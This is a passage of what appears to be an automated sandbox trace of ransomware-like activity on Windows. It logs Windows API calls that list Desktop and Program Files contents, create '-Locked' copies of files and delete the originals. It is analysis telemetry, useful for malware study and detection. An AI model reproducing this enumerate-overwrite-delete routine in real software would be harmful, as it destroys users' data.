nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HElJnZ.bmp-Locked", cAlternateFileName="HELJNZ~1.BMP")) returned 1 [0299.416] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32818f84, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32818f84, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32818f84, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HhodZgzF8 9dLBFX.avi-Locked", cAlternateFileName="HHODZG~2.AVI")) returned 1 [0299.416] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32825171, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32825171, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32825171, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="iWyhboFMJLgPq_b7Ud9.avi-Locked", cAlternateFileName="IWYHBO~2.AVI")) returned 1 [0299.417] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32830233, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32830233, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32830233, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IZrQfjN.m4a-Locked", cAlternateFileName="IZRQFJ~1.M4A")) returned 1 [0299.417] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32841392, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32841392, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32841392, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L0Cw.docx-Locked", cAlternateFileName="L0CW~2.DOC")) returned 1 [0299.417] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3284eac3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3284eac3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3284eac3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L3CXAN4c0b0rw2-.mkv-Locked", cAlternateFileName="L3CXAN~2.MKV")) returned 1 [0299.417] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3285ad2f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3285ad2f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3285ad2f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="L_wFYu3lS.pptx-Locked", cAlternateFileName="L_WFYU~2.PPT")) returned 1 [0299.418] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3286843c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3286843c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3286843c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MyZQDkF.mp3-Locked", cAlternateFileName="MYZQDK~1.MP3")) returned 1 [0299.418] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287204a, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287204a, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287204a, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nRKT5nI-9Sno8sTzM1P5.wav-Locked", cAlternateFileName="NRKT5N~2.WAV")) returned 1 [0299.418] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3287d036, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3287d036, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3287d036, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OqWYTp.bmp-Locked", cAlternateFileName="OQWYTP~1.BMP")) returned 1 [0299.418] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3288a749, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3288a749, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3288a749, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SkBr_ODTO7.ppt-Locked", cAlternateFileName="SKBR_O~2.PPT")) returned 1 [0299.418] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32896a80, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32896a80, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32896a80, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SoNi.jpg-Locked", cAlternateFileName="SONI~1.JPG")) returned 1 [0299.419] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328add42, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328add42, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328add42, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sTLRgmy.flv-Locked", cAlternateFileName="STLRGM~1.FLV")) returned 1 [0299.419] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328c165b, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328c165b, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328c165b, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tmhBBPCr.mp4-Locked", cAlternateFileName="TMHBBP~1.MP4")) returned 1 [0299.419] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328d28c0, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328d28c0, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328d28c0, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="TujlyxlbhAxVP9v1.mp4-Locked", cAlternateFileName="TUJLYX~2.MP4")) returned 1 [0299.420] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328e38e5, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328e38e5, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328e38e5, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="V0zO8w_tvkIQjvRX6KqC.jpg-Locked", cAlternateFileName="V0ZO8W~2.JPG")) returned 1 [0299.420] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x328f37f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x328f37f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x328f37f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VL-8wX.png-Locked", cAlternateFileName="VL-8WX~1.PNG")) returned 1 [0299.420] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329021a3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329021a3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329021a3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WJV4 Vo51_-ctoxSde.gif-Locked", cAlternateFileName="WJV4VO~2.GIF")) returned 1 [0299.420] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 1 [0299.421] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32913273, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32913273, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x32913273, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y4hqqhoePb18-mRGw.pdf-Locked", cAlternateFileName="Y4HQQH~2.PDF")) returned 0 [0299.421] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0299.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0299.421] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked", lpFilePart=0x0) returned 0x38 [0299.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.421] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.423] GetFileType (hFile=0x49c) returned 0x1 [0299.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.423] GetFileType (hFile=0x49c) returned 0x1 [0299.425] CloseHandle (hObject=0x49c) returned 1 [0299.425] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked", lpFilePart=0x0) returned 0x31 [0299.426] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\0aih45hu.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\0aih45hu.jpg-locked")) returned 1 [0299.427] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked", lpFilePart=0x0) returned 0x3d [0299.427] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.427] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.428] GetFileType (hFile=0x49c) returned 0x1 [0299.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.428] GetFileType (hFile=0x49c) returned 0x1 [0299.430] CloseHandle (hObject=0x49c) returned 1 [0299.430] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked", lpFilePart=0x0) returned 0x36 [0299.430] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\4-0bKIu_zvUdt.mkv-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\4-0bkiu_zvudt.mkv-locked")) returned 1 [0299.432] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked", lpFilePart=0x0) returned 0x69 [0299.432] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0299.432] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.433] GetFileType (hFile=0x49c) returned 0x1 [0299.433] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0299.433] GetFileType (hFile=0x49c) returned 0x1 [0299.436] CloseHandle (hObject=0x49c) returned 1 [0299.437] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe", lpFilePart=0x0) returned 0x62 [0299.437] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\69811a6c9376b219b335a055cfa970d38cd768abeca7138a2c1905560d468fef.exe")) returned 0 [0299.493] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0299.493] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af194) returned 1 [0299.493] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files", nBufferLength=0x105, lpBuffer=0x1aec9c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files", lpFilePart=0x0) returned 0x23 [0299.493] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\", nBufferLength=0x105, lpBuffer=0x1aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\", lpFilePart=0x0) returned 0x24 [0299.494] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\*.*", lpFindFileData=0x1aeebc | out: lpFindFileData=0x1aeebc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x329e4cb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0299.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb8017995, ftLastAccessTime.dwHighDateTime=0x1d7e78c, ftLastWriteTime.dwLowDateTime=0x329e4cb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0299.497] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xab1c9d90, ftCreationTime.dwHighDateTime=0x1d7d4d9, ftLastAccessTime.dwLowDateTime=0x584d6b30, ftLastAccessTime.dwHighDateTime=0x1d7e370, ftLastWriteTime.dwLowDateTime=0x584d6b30, ftLastWriteTime.dwHighDateTime=0x1d7e370, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe", cAlternateFileName="ACTIVE~1.EXE")) returned 1 [0299.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329e4cb6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x329e4cb6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x329e4cb6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="active-charge.exe-Locked", cAlternateFileName="ACTIVE~2.EXE")) returned 1 [0299.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x55499555, ftCreationTime.dwHighDateTime=0x1d705ee, ftLastAccessTime.dwLowDateTime=0x55499555, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x55499555, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="DESIGNER", cAlternateFileName="")) returned 1 [0299.500] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x5557162e, ftLastAccessTime.dwHighDateTime=0x1d705ee, ftLastWriteTime.dwLowDateTime=0x5557162e, ftLastWriteTime.dwHighDateTime=0x1d705ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Shared", cAlternateFileName="MICROS~1")) returned 1 [0299.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1dbc800, ftCreationTime.dwHighDateTime=0x1d770a5, ftLastAccessTime.dwLowDateTime=0xb9f5fd00, ftLastAccessTime.dwHighDateTime=0x1d7df76, ftLastWriteTime.dwLowDateTime=0xb9f5fd00, ftLastWriteTime.dwHighDateTime=0x1d7df76, nFileSizeHigh=0x0, nFileSizeLow=0x13a00, dwReserved0=0x0, dwReserved1=0x0, cFileName="oh pain.exe", cAlternateFileName="OHPAIN~1.EXE")) returned 1 [0299.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc6d7de, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x332baca, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0x332baca, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Services", cAlternateFileName="")) returned 1 [0299.501] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 1 [0299.502] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aeecc | out: lpFindFileData=0x1aeecc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc93a39, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbd27a88b, ftLastAccessTime.dwHighDateTime=0x1d112f1, ftLastWriteTime.dwLowDateTime=0xbd27a88b, ftLastWriteTime.dwHighDateTime=0x1d112f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System", cAlternateFileName="")) returned 0 [0299.502] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0299.502] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af154) returned 1 [0299.503] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af160) returned 1 [0299.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe", lpFilePart=0x0) returned 0x35 [0299.503] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", lpFilePart=0x0) returned 0x3c [0299.503] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.503] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked" (normalized: "c:\\program files (x86)\\common files\\active-charge.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.504] GetFileType (hFile=0x49c) returned 0x1 [0299.504] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.504] GetFileType (hFile=0x49c) returned 0x1 [0299.506] CloseHandle (hObject=0x49c) returned 1 [0299.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked", lpFilePart=0x0) returned 0x3c [0299.507] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked-Locked", lpFilePart=0x0) returned 0x43 [0299.507] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.507] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\active-charge.exe-Locked-Locked" (normalized: "c:\\program files (x86)\\common files\\active-charge.exe-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.508] GetFileType (hFile=0x49c) returned 0x1 [0299.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.508] GetFileType (hFile=0x49c) returned 0x1 [0299.511] CloseHandle (hObject=0x49c) returned 1 [0299.511] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\oh pain.exe", nBufferLength=0x105, lpBuffer=0x1aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\oh pain.exe", lpFilePart=0x0) returned 0x2f [0299.511] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\oh pain.exe-Locked", nBufferLength=0x105, lpBuffer=0x1aeb64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\oh pain.exe-Locked", lpFilePart=0x0) returned 0x36 [0299.511] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af058) returned 1 [0299.511] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\oh pain.exe-Locked" (normalized: "c:\\program files (x86)\\common files\\oh pain.exe-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0299.512] GetFileType (hFile=0x49c) returned 0x1 [0299.512] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af054) returned 1 [0299.512] GetFileType (hFile=0x49c) returned 0x1 